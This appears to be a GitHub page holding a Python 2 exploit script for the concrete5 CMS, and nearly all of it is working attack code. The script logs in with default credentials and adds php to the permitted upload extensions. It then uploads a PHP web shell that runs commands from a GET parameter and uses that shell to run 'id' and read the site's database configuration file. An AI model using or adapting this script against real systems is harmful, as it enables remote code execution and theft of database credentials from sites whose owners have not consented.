tmp/shell-concrete5.py at master · javapro13/tmp · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
c@kali:~/src/napalm2.2/modules$ cat shell-concrete5.py
#!/usr/bin/env python
# shell-concrete5.py - module based on previous version
#   created 29.04.2017. Bug ('feature') is exploitable only
#   when you will have a valid credentials.
import sys
import re
import requests

target = raw_input("[+] Hostname> ")
logMe = target + '/index.php/login'
session = requests.session()

initreq = session.get(logMe)
initresp = initreq.text

gettoken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
found = re.search(gettoken, initresp)

if found:
  token = found.group(1)
  print '[+] Found token: ' + str(token)


  # assuming token is valid, let's log in
  login_data = {
        'uName':'user',
        'uPassword':'bitnami',
        'ccm_token':token
  }
  loglink = target + '/index.php/login/authenticate/concrete'
  loginreq = session.post(loglink, data=login_data)

  #afterlogin = target + '/index.php/dashboard/system'
  afterlogin = target + '/index.php/dashboard/system/files/filetypes'
  nextreq1 = session.get(afterlogin)
  nextresp1 = nextreq1.text
  print '[+] Cool, we\'re logged-in!'
  #print afterlogin
  #print nextresp1
  print '[+] We are ready to go, extension-page is available.'
  print ''

  # construct POST with new.ext
  newToken = re.compile('<input type="hidden" name="ccm_token" value="(.*?)"/>')
  foundToken = re.search(newToken, nextresp1)

  if foundToken:
    newOne = foundToken.group(1)
    print '[+] New token grabbed: ' + str(newOne)

    data_ext = {
        'ccm_token':newOne,
        'file-access-file-types':'mov,asp,html,yyyy,zzzz,php,newone'
    }
    datalink = target + '/index.php/dashboard/system/files/filetypes/file_access_extensions'
    datareq = session.post(datalink, data=data_ext)
    dataresp = datareq.text
    nowwecan = re.compile('file-access-file-types" class="form-control" rows="3">(.*?)</textarea>')
    newexts = re.search(nowwecan, dataresp)

    if newexts:
      print '[+] Available now: '+  newexts.group(1)

      print '[+] Time to upload shell...'

      # next token to upload request
      nextTokenUrl = target + '/index.php/tools/required/files/import?currentFolder=0'
      tokreq3 = session.get(nextTokenUrl)
      tokresp3 = tokreq3.text

      grabNextTok = re.compile('input type="hidden" name="ccm_token" value="(.*?)"/>')
      foundit = re.search(grabNextTok, tokresp3)

      if foundit:
        tokentoup = foundit.group(1)
        print '[+] Next token (3rd): ' + str( tokentoup )

      # we are logged-in; preparing req to upload shell
      saymyname = 'meshell3.php'

      fp = open(saymyname,'w')
      fp.write('<?php system($_GET["xx"]);')
      fp.close()

      # tmpshfile ready, do req now
      up_files = { 'file':open(saymyname,'rb') }

      up_params = {
          'ccm_token':tokentoup,
          'filename':saymyname,
          'currentFolder':'0'
      }
      upreqlink = target + '/index.php/ccm/system/file/upload'
      upreqnow = session.post(upreqlink, files=up_files, data=up_params)
      upresp = upreqnow.text
      if saymyname in upresp:
        print '[+] Shell properly uploaded. Time to find it ('+str(saymyname)+')'

        searchme = target + '/index.php/dashboard/files/search'
        dosearch = session.get(searchme)
        meresp = dosearch.text

        searchShLink = re.compile(saymyname+'","urlInline":"http:(.*?)download_file(.*?)view_inline(.*?)","urlDownload":')
        foundShLink = re.search(searchShLink, meresp)

        if foundShLink:
          foundId = foundShLink.group(3)
          shid = foundId.strip('\/')
          print '[+] Found link ID:' + str(shid)

          preparingProp = target + '/index.php/ccm/system/dialogs/file/properties?fID='+str(shid)
          prepreq = session.get(preparingProp)
          prepresp = prepreq.text
          whereareutxt = '<a target="_blank" href="(.*?)/application/files/(.*?)' + saymyname +'">'
          whereareu = re.compile(whereareutxt)
          foundme2 = re.search(whereareu, prepresp)

          if foundme2:
            print '[+] Shell is ready to use:'
            shellshere =  target + '/application/files/' + foundme2.group(2) + '/'+saymyname + '?xx=id;cat ../../../../config/database.php'#id'
            print '       ' + shellshere

            print '[+] "Finish him!" ;7'
            finish = session.get(shellshere)
            fintxt = finish.text
            print '[+] Response:'
            print fintxt
            print '\n---------------'

      else:
        print  '[-] I can not upload our shell. Verify!'